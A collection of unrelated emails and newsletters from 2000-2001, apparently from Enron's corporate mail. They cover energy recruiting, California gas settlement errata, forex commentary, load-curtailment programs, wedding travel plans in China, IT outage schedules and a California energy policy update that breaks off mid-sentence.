[email protected] www.glocaplaw.com To be removed from any future mailing of this kind from Glocap, please reply to this email with "remove" in the subject line. Thank you. To be removed from any future mailing of this kind from Glocap, please reply to this email with "remove" in the subject line. Thank you. Message sent by: Steven J. Greenberg Glocap Legal Search LLC Tel: (212) 333-6431 Fax: (212) 333-6401 Email: [email protected] http://www.glocap.com *** Glocap provides financial, legal and technical recruiting to private equity firms, their portfolio companies, and Fortune 1000 companies. http://www.glocap.com *** *** Forbes selected Glocap as its "Favorite Headhunter" in its Best of the Web issue published in Spring 2001. Click on http://www.forbes.com/bow/b2c/review.jhtml?id=2812 for more details. Glocap is also the exclusive career partner of Venture Economics (publisher of Private Equity Week, VC Journal, Buyouts, The IPO Reporter, etc.) and the Daily Deal. ***
The Austin Group Energy, L.P. Monthly Newsletter Let's describe a typical and recurring nightmare for generating unit operators. It's noon on August 15, temperatures have reached the upper 90s all week; you're well into your reserve margin to serve native load, when a unit trips off line. Do you scramble to find replacement power at record high prices and worry about the consequences later? Or, have you prepared for this event? When the degree of risk has not been quantified, fear of the unknown can lead to restless nights, and understandably so. The financial implications can be astounding when a unit outage occurs during a period of high spikes in market prices. How does this relate to the recruitment and hiring of talent within your shop? Allow me to bring the story together. What would you do if your top employee came to you and said, "You've been great to me and I've learned alot, but I just accepted a job at your level right down the road and they like me so much they want me to start tomorrow." Do you spring into 911 mode or are you ready for this day. Start a relationship today with The Austin Group Energy. We will keep you aware of all available talent in your market area. These candidates are currently employed and do not answer ads. They stay in touch with opportunities through us to ensure confidentiality. Why would Top 5 marketing companies pay us for the recruitment and placement of over 400 successful hires when they could hire them on their own. The smart and proactive companies understand how to outpace the pack when it comes to hiring talent, they call The Austin Group Energy. THE FOLLOWING CANDIDATES ARE AVAILABLE FOR IMMEDIATE OPPORTUNITIES: Ref# 00012123 Power Options Trading Desk This PhD candidate is responsible for long term derivatives trades/structures (Asian options, heat rate options, weather/power derivatives structures, swing options etc.) Ref# 00012124 Rotational Program- Risk Analytics This MBA Finance candidate is analyzing/evaluating structured transactions and derivative instruments. Has developed a VBA-based delta-adjusted risk exposure model for all asset management groups. Designed intermediate-term forward power curve forecasting model based on gas forward curve. Created Visual Basic Monte Carlo simulator for Excel for option analysis. Ref# 00012125 Quantitative Analyst This M.S. in Applied Mathematics candidate builds short term models necessary to forecast/schedule usage on a portfolio basis, by various levels of aggregation (e.g. region, congestion zone, weather zone, customer, etc.) Constructing statistical and econometric models to accurately predict seasonal customer usage based on rate class, calendar and geographic climate patterns. Ref# 00012126 Quantitative Analyst - Manager This candidate developed and implemented two Value-At-Risk (VAR) methods for Natural Gas. Developed and implemented models for pricing and hedging exotic natural gas options (Gas Daily and Peaker). OpenLink experience with VaR and mark-to-market calculations. Ref# 00012127 Director Derivatives Trading and Portfolio Management Developed Nymex and locational options, position risk management model. Evaluated and assisted in the process of selecting and implementing a new real time front and back office financial system with VAR capabilities. Structured deals for marketers using embedded financial products and traded natural gas options and fixed for float swaps. Priced and hedged advanced options and swaps such as swaptions, asians, extendibles, expandibles, and spread options. Ref# 00012128 Risk Control Analyst Support Origination and Trading activities by providing daily mark-to-market values and VaR reports through accurate and timely entry of financial transactions into RMS system. Maintain database for RMS system and Integrated Commodity Trading System (ICTS) for entry of financial trades. Ref# 00012129 Risk Manager Responsible for all mid-office trader support functions. Responsibilities include daily senior management position and P&L reporting, process improvements, system implementations, structuring of originated transactions, and rollout of an operational analysis plan. Ref# 00012130 Senior Commercial Analyst: Pricing and Structures Developing model to incorporate basis and transportation into gas fuel costs utilized in mark-to-market valuation of a gas-fired generation asset. Determined market value of regional power by confirming the marks estimated by the trade desk against independent broker prices. Forecasted resulting previous day's trade-to-market figure for preliminary valuation of book value. Ref# 00012131 Director - Risk Management Analyze financial markets and advise physical traders of hedging and trading opportunities. Analyze market, secure management approval of trading strategies and execute financial trades. Generate position reports for upper management. Ref# 00012132 Risk Management Specialist Perform risk management functions for the gas trading organization, including daily position and P&L reporting. Ensure deal validation and perform problem resolution for executed trades. Create daily VaR estimates for both cash and term traders. Ref# 00012133 Risk Analyst Determine market value of regional power, confirming the market values estimated by trade desk against prices set for independent brokers. Forecast resulting previous day's trade-to-market figure for preliminary valuation of book value. Participate in daily Value at Risk calculations, exception reporting for daily variances, updating of daily price curves, and updating proprietary models which value long term transactions. Paul Johnson President- TAGE Ofc (281) 600-8145 Mbl (281) 814-3886 Visit our Website http://www.austingrp.com - Paul Johnson.vcf
To signatories to the Comprehensive Settlement for SoCalGas & SDG&E: A few more "errata" I plan to make, absent objection: A. Creditworthiness Sections ( and In on p.21, under b., subitem ii. should have "or" inserted at the end of the subitem and the "or" at the end of subitem iii. should be stricken (so that the reports or forms listed in i., ii., and iii. are alternatives to each other (customer only has to provide one of the three) and subitems iv. and v. are additional required items). In on pp.36-37, make parallel changes in the "or"s as stated above. On p.22, under h., subitems i. through v. should be indented more than h. and then items j), k) and l) should be renumbered i., j., k. (this will then match section, which has the correct spacing/alphanumbering). On p.22 and p.37, we'd like to drop the reference to "U.S." in the reference to a letter of credit issued by a major "U.S." financial institution. SoCalGas has realized that it has already had dealings with Canadian or other foreign-owned customers where it was reasonable to rely on letters of credit from major financial institutions of the parent's country. (This should be ok with Paul Amirault, eh?) B. Btu content On pp.10 (twice) and 31, the settlement says we are assuming 1,016 Btu/mcf for the heating value of gas (subject to revision by Commission during term of settlement). We have the wrong units. It is 1,016 Btu per cubic foot, not per thousand cubic feet. We'd propose to change the number to 1,016 Btu/cf (not "1,016 Btu/mcf") On p.33, we got the units right the first time and don't need to change them on that page. Again, I'd appreciate you getting back to me or Brian Cherry by noon Friday if you have any problem with the above changes. -- Glen Sullivan -----Original Message----- From: Sullivan, Glen J. Sent: Wednesday, April 26, 2000 12:58 PM To: 'MBD'; 'Leslie, John'; 'Elsesser, Evie'; 'McCrea, Keith'; 'Pocta, R. Mark'; 'Dasovich, Jeff'; 'Beach, Tom'; 'Burkholder, John'; 'Amirault, Paul'; 'Alexander, Michael'; 'Chancellor, Craig'; 'Dingwall, B.'; 'Douglass, Dan@SES'; 'Fawcett, Jeff'; 'Porter, Doug'; 'Rochman, Michael'; 'Counihan, Rick'; 'Bayless, David'; 'Paul, Joe'; 'Jimison, John'; 'Foss, Robert'; McVay, Nancy W - TPNWM; 'Scott, Susan'; 'Karp, Joe'; 'Johnson, Pamela'; 'gileau, patrick' Cc: Lorenz, Lad - TPLPL; Nelson, Eric B. - TPEBN; Morrow, Rick - TP3RMM; Follett, B. David - TPDBF; Brill, Thomas R.; Van Lierop, Jan - TP2JXV; Harrigan, James P. - TP1JPH; Sakarias, Wayne P.; Purves, Ralph A.; Teeter, James S.; Watson, Steven - TP2SAW; Cherry, Brian - TPBKC; Whitaker, Sue Subject: RE: Gas Industry Settlement To signatories to the Comprehensive Settlement: ALJ Biren has given us until Friday of this week (April 28, 2000) to file "errata" to the Comprehensive Settlement. So far, I am planning to make the following non-substantive changes: 1. The table of contents was seriously messed up by an "automatic update" feature in Word just before we duplicated and filed. I will be putting it back to the state you saw in the final draft. 2. On p.7, section 1.12, put a period at the end of the last sentence. 3. On p.9, section, two thirds of the way down the page, I will be changing "subject to adjustment annual by the base rate PBR formula" to "subject to adjustment annually by the base rate PBR formula". 4. On p.27, section 1.5.4, in the third full paragraph on the page, I will be changing "If only one customer has an OFO day" to "If only one customer class has an OFO day". 5. Also on p.27, section 1.5.4, bottom line on the page, I will be filling in the blank with "C" (so it reads "Appendix C") In the category of "maybe substantive", 1. On p.10, section, three lines from the bottom of the page, the date "October 1, 2000" would be changed to "October 1, 2001". This sentence refers to including the cost of backbone transmission for core customers buying gas from SoCalGas in the "procurement" rate. Obviously, our intent was to do that only once we had unbundled backbone transmission, which happens on October 1, 2001. In the category of "substantive": 1. Our capacity term sheet had said that we would unbundled "additional" (non-reliability) storage for CTAs effective upon implementation of the settlement (See p.4). The filed settlement managed to drop the section that provided for this option for CTAs prior to the principal storage change on April 1, 2001. (The filed settlement is ok for the period starting April 1, 2001). So, to be consistent with the term sheet, we need to insert something back into the settlement to allow CTAs to opt out of non-reliability storage in the period from the effective date (90 days after approval) to April 1, 2001. Obviously, this may not be a very long period. John Leslie has suggested inserting at the very beginning of Section "In the partial storage year beginning on the effective date of this Settlement Agreement, and....[continue with current text]." We would need to cover as part of implementation filings the exact mechanism/pricing for SoCalGas purchasing gas in storage owned by CTAs if they opt out of nonreliability storage prior to April 1. 2001. SoCalGas and SDG&E are ok with John's language and want to make sure it is ok with other signatories. If you have any problems with any of these changes, please contact me or Brian Cherry by noon on Friday, April 28. My email is [email protected] and my phone is (619) 699-5162. Brian's email is [email protected] and phone is (213) 244-3895. We are looking at the possibility of two or three additional changes, and Brian may send you a follow-up message. -- Glen Sullivan Sempra Energy Law Dept.
[IMAGE] Forums Discuss these points in the Forums: Forexnews Forum Technicals Live Charts Analysis available from: Cornelius Luca J.P. Chorek Technical Research Ltd. Charts & News featuring Standard & Poor's Interest Rates US: Japan: Eurozone: UK: Switzerland: 1.75% 0.15% 3.25% 4.0% 1.25-2.25% [IMAGE] [IMAGE] JPY Cools on Jawboning, Bewildered USD Awaits Data March 8, 7:00 AM: EUR/$..0.8783 $/JPY..128.15 GBP/$..1.4253 $/CHF..1.6728 JPY Cools on Jawboning, Bewildered USD Awaits Data by Jes Black At 8:30:00 AM US Feb Payroll Employment (exp 9k, prev -89k) US Feb Unemployment (exp 5.7%, prev 5.6%) US Feb Avg Hourly Earnings (exp 0.3%, prev 0%) US Feb Avg Work Week (exp 34.2%, prev 34%) The dollar recovered to back above 128 yen after Thursday's record four-yen decline and rebounded one half cent against the euro from an overnight 6-week low of 88.40. Further gains in the Nikkei today had little effect on the yen and trade was subdued ahead of key US jobs data due at 8:30 AM. Japanese official, Kuroda, said the Finance Ministry would take action against rapid currency fluctuations. This helped the dollar come off recent lows. However, it lacked urgency as BoJ Governor Hayami said he was not worried about current FX levels. Instead, Hayami gave credit to the recent move as part of the BoJ's monetary policy easing last week. Dealers also suspected the government's top priority is to keep stocks strong ahead of fiscal year-end bookclosings as dealing with a financial crisis would be worse than the effects of a stronger yen. USD/JPY is now supported at 127.75, which marks the 38.2% retracement of the 115.75-135.15 move provided a solid base for a corrective rally in the pair. However, speculators who had been on the sidelines have poured in to go long the yen. Therefore, USD/JPY could still target 125.28, the 50% retracement of the same move. More importantly, the yen is approaching its 200-day moving average of 125 for the first time since November. Meanwhile, the government's resolve to boost Japanese assets ahead of March 31 is likely to fend off any negative news that comes its way. Case in point was today's 2% rise in the Nikkei despite Japan's Q4 GDP which fell 1.2% q/q and was the first time in nearly a decade that output had fallen three quarters in a row. The figure attracted little attention and instead, talk of a global recovery has sparked a wave of foreign money coming into Japan as large American banks have announced their repositioning in favor of Japanese shares. Japanese banks are pinning their hopes on the stock market holding onto recent gains, at least until the end of the fiscal year end on March 31, when they book their massive stockholdings at market value. If players can hold the Nikkei at 12,000, banks could slash latent stock losses by trillions of yen, help improve their capital adequacy ratios and keep them solvent. However, this would still not solve their fundamental problems. Therefore, there still remains doubt as to whether the Nikkei can maintain its recent gains after the March 31 fiscal year end and whether the spectacular rise in yen on speculative trading will come undone over the next few weeks. BoJ Governor Hayami alluded to this today when he said he expected the market to be stable through the end of March, but did not say what could happen afterwards. USD/JPY fell nearly 5% this week alone, while EUR/JPY fell only 3%. This gap has been filled by the 2 cent rise in EUR/USD and supports the notion that rise in the yen is strictly a Japan-driven play rather than a global growth-driven play. The enforcement of anti-short-selling laws in Japan and the rebound in the Nikkei enhances the yen repatriation play. EUR/USD fell to a day's low of 87.80 as it retreated from an overnight high of 88.40. On Thursday, the market ignored the European Central Bank's decision to keep rates steady at 3.25%. Markets had anticipated the central bank would take no action due to growing signs of Eurozone economic recovery and rising inflationary pressures. But despite the recent rise in EUR/USD, the dollar's weakness is primarily contained to the yen. Nevertheless, the euro is still threatening to take out 88.10 cents, which is the 50% retracement of this year's move 90.63 to 85.63. From there, the euro faces its next resistance at 88.50. Support is viewed at 87.0, backed by 86.65 and 86.30. The pound was also steady against the dollar around 1.4250 after whipsawing between a 1-1/2 week high of 1.4313 against the dollar, and a 2-session low of 1.4184 cents. Resistance is still seen at 1.4300 and the 200-day moving average of 1.4333, followed by 1.4370 and 1.440. Support holds at 1.420, 1.4170 and 1.4130. Traders will watch today's US labor report for signs that the recession is taking less of a toll on the workers. The labor market is expected to begin a service production recovery while manufacturing payrolls will continue to contract. US employment labor report is expected to show the creation of 5K to 10K in non-farm payrolls, though some private forecasts expect the creation of 100K. The unemployment rate is expected to rise to 5.8% from 5.6%, while average hourly earnings are seen up 0.3% from 0.0%. [IMAGE] Audio Mkt. Analysis Yen Soars 3.5% vs USD Articles & Ideas Yen's March Madness Will Dollar be Fuelled against the Euro? Articles & Ideas Forex Glossary Economic Indicators Forex Guides Link Library [IMAGE] [IMAGE][IMAGE] [IMAGE][IMAGE] This e-mail is never sent unsolicited. If you wish to unsubscribe from this or any other Forexnews.com newsletters, please click here . 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From: Harry Kingerski@ENRON on 03/06/2001 09:02 AM To: Susan J Mara/NA/Enron@ENRON, Jeff Dasovich/NA/Enron@Enron, James D Steffes/NA/Enron@Enron, Paul Kaufman/PDX/ECT@ECT cc: Fred L Kelly/ENRON_DEVELOPMENT@ENRON_DEVELOPMENt, Dave Roberts/HOU/EES@EES, Gary Weiss/HOU/EES@EES, Scott Stoness/HOU/EES@EES, Jubran Whalan/HOU/EES@EES, Neil Bresnan/HOU/EES@EES, Leslie Lawner/NA/Enron@Enron, Robert Frank/NA/Enron@Enron, Scott Gahn/HOU/EES@EES Subject: AB31X - Response Needed Mike Day left me a message saying in discussions yesterday on AB 31X (Wright's load curtailment bill), the utilities were making the point that 31x should only address bundled customers since the utilities were making the incentive payments out of funds that would otherwise go to pay DWR (in effect, the curtailments are reducing the utility net short position). They were ok with having ESPs aggregate the loads of bundled customers (which will be a very significant win, if we get it). They think DA customers can get curtailment benefits through existing (and new) ISO programs. The dilemmas are: the ISO programs may or may not be finalized for this summer and may or may not give incentives that are as beneficial as AB31X the utility plan discriminates against DA ( The ISO program definitely does not sound as beneficial as AB31X. I have a call into the ISO, the last I heard was that the Demand Relief Program was the closest product they had to being finalized ) preferably, the ISO would administer the programs described by AB31X for all customers but that puts the ISO in the position of having to get approvals from FERC for a CA-legislated program (they will have to do this anyway) (nearly) all of our customers will be bundled this summer anyway, so there's no immediate loss from going with the utility's position We owe Mike an answer today. Any thoughts? My suggestion at this point is to stick with the high road and argue for non-discriminatory treatment with equal incentives paid to bundled and DA customers. At this point a non-discriminatory treatment with equal incentives is the only way you are going to get participation. Background: AB31X would give $500/mwh incentives for day ahead curtailment, $750/mwh incentives for day-of curtailments, and incentives to be determined for scheduled load reductions. The ISO would invoke the programs based on system conditions. These prices seem reasonably priced and should definitely persuaded customers to participate. The ISO so far has put in place the equivalent of a scheduled load reduction program, with specific payments, but has not finalized any day ahead or day of programs. The current proposed ISO Programs outlined Below Program 1) Demand Relief Program The customer will curtail prior to stage 3 rotating blackout. Loads without back-up generators can be curtailed up to 24 hours per month and loads with back-up generators can be curtailed a total of 21 hours for the duration of the program. The duration of the program is scheduled for June 1 through September 30. There will be a fixed monthly capacity reservation payment, adjusted based on actual average monthly performance, and a performance energy payment that will be made for each curtailment. The performance energy provides incentives for over performance and penalties for under performance. Additionally, loads that don't perform will be penalized through loss of a portion of their capacity payment. Settlement will occur through SC's/Aggregators separately from the normal retail billing process. The reservation price is preset at $20,000 per MW-month and the curtailment performance payment is $500 per MWh. Eligibility for this program is still being worked out. Currently loads that were served under an interruptible tariff in 2000 were not allowed to participate in the February 6 submittal for the Summer 2001 program. ISO management may open, subject to board approval, the Demand Response Program to a subsequent bids from PG&E and possibly SCE interruptiple customers that have exhausted their required 2001 curtailments, pending CPUC rulemaking on interruptibles. As soon as the board approves in the program, which is expected in days, the ISO will initiate a major activity immediately to have all participants ready by May 15 to establish the 10 day baseline for performance measurement. Program 2) ISO Discretionary Load Program Intent of this program is to attract significant voluntary curtailments before the ISO enters emergency conditions. This program provides a set energy-only payment of $250/MWh. This provides the ISO a Known curtailment comminment. Notifications will be sent to SC's/Aggregators when the ISO issues warnings and anticipates a stage 1 emergency, typically early morning. There will be 60 to 90 minutes for the SC's/Aggregators to issue their voluntary curtailment notices and firm-up the actual block of curtailment available to the ISO. This Program will operate through March 2002. ISO plans to accept proposals from aggregators starting on February 28-March 7th. Payment will be based on an as-delivered basis with a preset payment per MW-hour. ISO is considering several options on where to set there price range. One proposal is $250MWh-$500MWh. There is no capacity or reservation payment. Program 3) ISO Participating Ancillary Services Load Program This allows loads to bid into the A/S and supplemental energy market. The program allows loads to participate as price-responsive demand in the ISO A/S market and Supplemental markets. This market has been extended indefinitely as part of the semi-annually filing to FERC in the ISO tariff. As an amendment to the tariff the ISO is making the following changes. The telemetry requirement has also been relaxed some for loads bidding into the supplemental energy market. Loads bidding into the Non-spinning and spinning reserve will still require telemetry. Loads can bid in above the $150 cap but must have cost justification for bids selected above the cap. Jubran
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----- Forwarded by Gerald Nemec/HOU/ECT on 05/18/2001 01:58 PM ----- "Gillaspie, Eric" <[email protected]> 05/18/2001 01:51 PM To: "'jonathan gillaspie'" <[email protected]> cc: "'[email protected]'" <[email protected]>, "Jennifer Gillaspie (E-mail)" <[email protected]>, "Jeff Gillaspie (E-mail)" <[email protected]>, "Sandra Gillaspie (E-mail)" <[email protected]>, "Rodger Gilllaspie (E-mail)" <[email protected]>, "Gerald Nemec (E-mail)" <[email protected]> Subject: RE: new e-mail addy Brudda, I spoke with Jenn about accommodations in Beijing as well as Shanghai and she said her dad is also getting some info from a local Chinese travel agent. How about dropping Dan a line and working with him to recommend & book everyone's hotel. His e-mail address is: [email protected] I believe part of the group is looking to Jon and the other part is looking to Dan to make their accommodations for them. I hereby anoint the two of you to make the lodging decisions for everyone else, as we are drooling cows with no direction or relevant info. Therefore, the two of you need to get together and decide on a hotel (for Shanghai & Beijing), so we can all be together and don't have to coordinate getting together everyday in freakin' China (i.e. nightmare). Jon maybe send an e-mail to Dan suggesting a few hotels/price/level of accommodations/etc./your recommendation/ and then you two make the call and book it for us. I think the "core" group we should worry about getting reservations/accommodations is as follows: Shanghai: (arrival on the 5th, Jenn, Eric, Heather, Gayle, Dan, Gerald, Barbara) 7 people-3 rooms for the night most likely (Jon you can crash in my room) Mom & Dad & aunt Jean and Kid arrive on the 6th (2 more room) Jeff and Cathy arrive on the 7th (1 more room) 8th we all fly to Qing dao, hotel in Qing Dao is selected and booked Beijing - Everyone listed above is traveling to Beijing as a group. As far as getting rooms for the other people (Staters, Rassmussen's, etc), that's your call, but we are operating without any real good info. I'd say they are on their own as we don't know when they get in, what their plans are, etc? If it's no big deal reserving rooms and not getting dinged if noone shows up then maybe get a few extra rooms at certain places, I don't know the Chinese hotel system, level of $$ exposure, hotel availability, etc., its your call, I'd assume they can probably get a room no problem so let's not try to coordinate more people than we have to, they can sleep on my floor if they can't get a room in China.... This is what is called Wedding planning lotus bliss... We are all looking forward to this... -----Original Message----- From: jonathan gillaspie [mailto:[email protected]] Sent: Friday, May 18, 2001 4:20 AM To: Gillaspie, Eric Subject: RE: new e-mail addy Eric, Thanks for the info. Will book flight for June 8th and find suitable lodging in Shanghai. Do you want me to line up lodging in Beijing for you and the rest of the entourage? Let me know, and I'll finish this madness while I'm in Qingdao this weekend with our friendly travel agent chum, Zang Bao Guo. Take care. Chazow, Jonny Luv >From: "Gillaspie, Eric" <[email protected]> >To: "'jonathan gillaspie'" <[email protected]> >CC: "Jeff Gillaspie (E-mail)" <[email protected]> >Subject: RE: new e-mail addy >Date: Wed, 16 May 2001 10:29:27 -0500 > >Arrive in Shanghai on the 5th: >Gerald Nemec >Barbara Waldrop >Gayle Junk >Dan Junk >Heather Junk >Jennifer Gillaspie >Eric Gillaspie > >Arrive in Shanghai on the 7th: >Jeff Gillaspie >Cathleen Clarke > > >I presume we'll all fly out to Qingdao together on the 8th in the morning. >We do need help getting hotels in Shanghai, maybe something around the >touristy areas, or whatever you suggest. > >-----Original Message----- >From: jonathan gillaspie [mailto:[email protected]] >Sent: Tuesday, May 15, 2001 8:09 PM >To: Gillaspie, Eric >Subject: Re: new e-mail addy > > >Dear Eric, > >Congrats on the new job. I've been e-mailing/harassing you for over one >week > >now trying to get some much needed info out of you concerning the upcoming >trip. I was beginning to get a little freaked-out: like you'd been >kidnapped > >or something. Unfortunately, my information requests coincided with your >job > >change and you probably never even got the messages. Fuckin great, man. > >Anyway- as you may well discern: I'M IN SUPER FREAK-OUT MODE. Please assist >me in obtaining the correct spellings of everyone's names in your >entourage. > >I'm trying to book flight tix for everybody from Shanghai>Qingdao. For >example, I don't even know Gerald and Barbara's surnames. I would also like >you to confirm the spellings of the Junk family's names. > >Two more things. Do you want help finding lodging in Shanghai? Do want me >to > >go ahead and book hotel rooms in Beijing for your entourage post-wedding? >Let me know what you want me to do. > >Looking forward to your repsonse. Hope the new job is a good fit for you. >Sorry to dump my load of stress on you. Take care. > >Love, > >Jon Gillaspie > > > >From: "Gillaspie, Eric" <[email protected]> > >To: "'[email protected]'" > ><[email protected]>, "'[email protected]'" > ><[email protected]>, "'[email protected]'" > ><[email protected]>, "'[email protected]'" > ><[email protected]> > >Subject: new e-mail addy > >Date: Tue, 15 May 2001 15:02:08 -0500 > > > >FYI, my work e-mail addy has changed, as I have changed jobs. > >_________________________________________________________________________ >Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com. _________________________________________________________________________ Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com.
------------------------------------------------------------------------------ ------------------------ W E E K E N D S Y S T E M S A V A I L A B I L I T Y F O R May 11, 2001 5:00pm through May 14, 2001 12:00am ------------------------------------------------------------------------------ ------------------------ SCHEDULED SYSTEM OUTAGES: ARDMORE DATA CENTER - FACILITY OPERATIONS: No Scheduled Outages. AZURIX: No Scheduled Outages. EB34 DATA CENTER - FACILITY OPERATIONS: No Scheduled Outages. EDI SERVER: No Scheduled Outages. ENRON CENTER SOUTH DATA CENTER - FACILITY OPERATIONS: No Scheduled Outages ENRON NORTH AMERICAN LANS: Impact: EES Time: Sat 5/12/2001 at 1:00:00 PM CT thru Sat 5/12/2001 at 5:00:00 PM CT Sat 5/12/2001 at 11:00:00 AM PT thru Sat 5/12/2001 at 3:00:00 PM PT Sat 5/12/2001 at 7:00:00 PM London thru Sat 5/12/2001 at 11:00:00 PM London Outage: Move vlans for EES in Enron Building Environments Impacted: EES in Enron Building Purpose: Provide more capacity to the network Backout: paste in old configs Contact(s): Gail Kettenbrink 713-853-4524 Michael Huang 713-345-3201 FIELD SERVICES: No Scheduled Outages. INTERNET: No Scheduled Outages. MESSAGING: No Scheduled Outages. MARKET DATA: No Scheduled Outages. NT: No Scheduled Outages. OS/2: No Scheduled Outages. OTHER SYSTEMS: Impact: Corp, OTS, ETS DATE: MAY 15, 2001/2/2001 at 5:30:00 PM Outage: Migrate DSS Server to GTHOU-APPSQ03P Environments Impacted: DSS users will not be able to access the old server (ENEDS01_ADAPT)after this date Purpose: The existing server is outdated, migrating to SQL 2000 provides increased functionality and conforms to database platform requirements. Backout: Contact(s): Mary Vollmer 713-853-3381 Joe Hellsten 713-853-7346 713-545-4164 Impact: CORP Time: Fri 5/11/2001 at 8:00:00 PM CT thru Sat 5/12/2001 at 10:00:00 PM CT Fri 5/11/2001 at 6:00:00 PM PT thru Sat 5/12/2001 at 8:00:00 PM PT Sat 5/12/2001 at 2:00:00 AM London thru Sun 5/13/2001 at 4:00:00 AM London Outage: CPU replacement on server sennacca. Environments Impacted: RMS Purpose: Replace faulty CPU that is offline. Backout: Restore server to old configuration. Contact(s): Malcolm Wells 713-345-3716 Impact: CORP Time: Fri 5/11/2001 at 5:00:00 PM CT thru Fri 5/11/2001 at 5:15:00 PM CT Fri 5/11/2001 at 3:00:00 PM PT thru Fri 5/11/2001 at 3:15:00 PM PT Fri 5/11/2001 at 11:00:00 PM London thru Fri 5/11/2001 at 11:15:00 PM London Outage: Decommission of the following servers: intra, intra-dev, conman1, aserv1, ardent, dbadmin Environments Impacted: Corp Purpose: Server no longer used. The servers will be decommissioned or redeployed where necessary. Backout: Contact(s): Malcolm Wells 713-345-3716 Impact: CORP Time: Sat 5/12/2001 at 2:00:00 AM CT thru Sun 5/13/2001 at 5:00:00 PM CT Sat 5/12/2001 at 12:00:00 AM PT thru Sun 5/13/2001 at 3:00:00 PM PT Sat 5/12/2001 at 8:00:00 AM London thru Sun 5/13/2001 at 11:00:00 PM London Outage: Resource and OS upgrade to server fracture. Environments Impacted: Global company RMS ECM Purpose: An OS upgrade is needed to provide the disk upgrade solution. Additionanl memory is needed as well. Backout: Attach the old disk solution and reboot to old configuration. Contact(s): Malcolm Wells 713-345-3716 Impact: ENA Time: Sat 5/12/2001 at 10:00:00 PM CT thru Sat 5/12/2001 at 10:15:00 PM CT Sat 5/12/2001 at 8:00:00 PM PT thru Sat 5/12/2001 at 8:15:00 PM PT Sun 5/13/2001 at 4:00:00 AM London thru Sun 5/13/2001 at 4:15:00 AM London Outage: Bounce PWRPROD1 database Environments Impacted: Enpower User Purpose: Change some configuration to improve database performance Backout: Use the old parameter file. Contact(s): Tantra Invedy 713 853 4304 SITARA: No Scheduled Outages. SUN/OSS SYSTEM: No Scheduled Outages. TELEPHONY: Impact: Time: Sat 5/12/2001 at 10:00:00 PM CT thru Sun 5/13/2001 at 1:00:00 AM CT Sat 5/12/2001 at 8:00:00 PM PT thru Sat 5/12/2001 at 11:00:00 PM PT Sun 5/13/2001 at 4:00:00 AM London thru Sun 5/13/2001 at 7:00:00 AM London Outage: Quarterly Maintenance - Telephone System Environments Impacted: All Purpose: Quarterly maintenance. While voicemail nodes are being serviced (one box at a time), a slight disruption will be experienced. Messages will continue to be stored but will not be delivered until each node of voicemail is back up and operational. CMS call center management reporting will not be availalble during this time. Backout: Contact(s): Cynthia Siniard 713-853-0558 TERMINAL SERVER: No Scheduled Outages. UNIFY: Impact: CORP Time: Fri 5/11/2001 at 6:00:00 PM CT thru Fri 5/11/2001 at 7:00:00 PM CT Fri 5/11/2001 at 4:00:00 PM PT thru Fri 5/11/2001 at 5:00:00 PM PT Sat 5/12/2001 at 12:00:00 AM London thru Sat 5/12/2001 at 1:00:00 AM London Outage: Memory replacement for server electron. Environments Impacted: Unify Users Purpose: Replace faulty memory module. Backout: Get new memory if necessary Restart server with out memory as last resort Contact(s): Malcolm Wells 713-345-3716 ------------------------------------------------------------------------------ ----------------------------------------------- FOR ASSISTANCE (713) 853-1411 Enron Resolution Center Specific Help: Information Risk Management (713) 853-5536 SAP/ISC (713) 345-4727 Unify On-Call (713) 284-3757 [Pager] Sitara On-Call (713) 288-0101 [Pager] RUS/GOPS/GeoTools/APRS (713) 639-9726 [Pager] OSS/UA4/TARP (713) 285-3165 [Pager] CPR (713) 284-4175 [Pager] EDI Support (713) 327-3893 [Pager] EES Help Desk (713)853-9797 OR (888)853-9797
----- Forwarded by Elizabeth Sager/HOU/ECT on 04/26/2001 09:31 AM ----- Sheila Tweed 04/26/2001 09:00 AM To: Elizabeth Sager/HOU/ECT@ECT, Karen E Jones/HOU/ECT@ECT, Dale Rasmussen/HOU/ECT@ECT cc: Subject: California Energy Update--FYI ----- Forwarded by Sheila Tweed/HOU/ECT on 04/26/2001 08:49 AM ----- [email protected] 04/26/2001 12:35 AM To: cc: Subject: California Energy Update 1.? Members of the Assembly Energy Costs and Availability Subcommittee opened? hearings today on the Memorandum of Understanding (MOU) between Southern California Edison Company (SCE), Edison International (EIX), and the California Department of Water and Power (CDWR).? Testifying on behalf of SCE were SCE Vice President Bob Foster and Ann Cohen.? Additional hearings will be scheduled next week at which time the subcommittee will hear from representatives of the Governor, the Attorney General, and CDWR.? Among other things, committee members questioned the wisdom of acquiring the transmission system, particularly on an "as is" basis, the price to be paid, alternative structures that would not require an acquisition by the state, and the rate of return on new investment in the utility. 2.? Also in Sacramento, the Senate Select Committee to Investigate Price Manipulation of the Wholesale Energy Market is scheduled to continue its investigation Thursday on market manipulation.? 3.? Governor Davis' representatives have been negotiating a transaction with Sempra, the parent company of San Diego Gas and Electric Co., to buy the utility's transmission assets.? The Governor's representatives expect to have an agreement within one to two weeks. 4.? Also today, Governor Davis announced the appointment of Richard Sklar to head a team that will speed the construction of power plants in the state.? The "Governor's Generation Implementation Taskforce" will work to bring electrical generation facilities on line by coordinating state permitting, siting, finance, design, and construction efforts in a "one stop shop." 5.? At its open meeting this evening, the Federal Energy Regulatory Commission (FERC) approved an order addressing market monitoring and mitigation for California wholesale power markets.? Based on the FERC staff presentation and discussion during the meeting, it appears that the market monitoring and mitigation plan for California includes the following: (1)? a requirement that all generators which entered into a Participating Generator Agreement with the ISO, and all non-public utilities in California that sell into the ISO's real-time market or use the ISO transmission grid, must offer all available electric capacity during all hours to the ISO real-time market, except for hydroelectric units. (2)? all public utility load serving entities in California must submit demand bids in real-time markets during all hours. (3)? all sales by market participants that have been granted authority by the FERC to sell power at market-based rates are subject to a refund condition to prevent anti-competitive bids into real time markets. (4)?? the ISO is required to submit weekly reports to the FERC on scheduled outages and bid data to facilitate market monitoring. (5)?? all sales into the ISO real-time market during a period of reserve deficiency (i.e., during Stage 1, 2 or 3 emergencies) will be subject to price mitigation.? The FERC order will include a formula that the ISO will be required to apply for purposes of calculating a proxy price for all such sales. The order will also enhance the ISO's ability to coordinate and control planned outages. The mitigation plan will be in effect for a one-year period, and will be subject to periodic review.? The FERC is also requiring the ISO and the investor-owned utilities to submit a filing by June 1, 2001, to form a Regional Transmission Organization (RTO).? If an RTO filing is not submitted by that date, then the market monitoring and mitigation plan will terminate automatically.? The FERC is also directing the parties to work with RTO West (an RTO approved for the Pacific Northwest) to develop a plan for including California within RTO 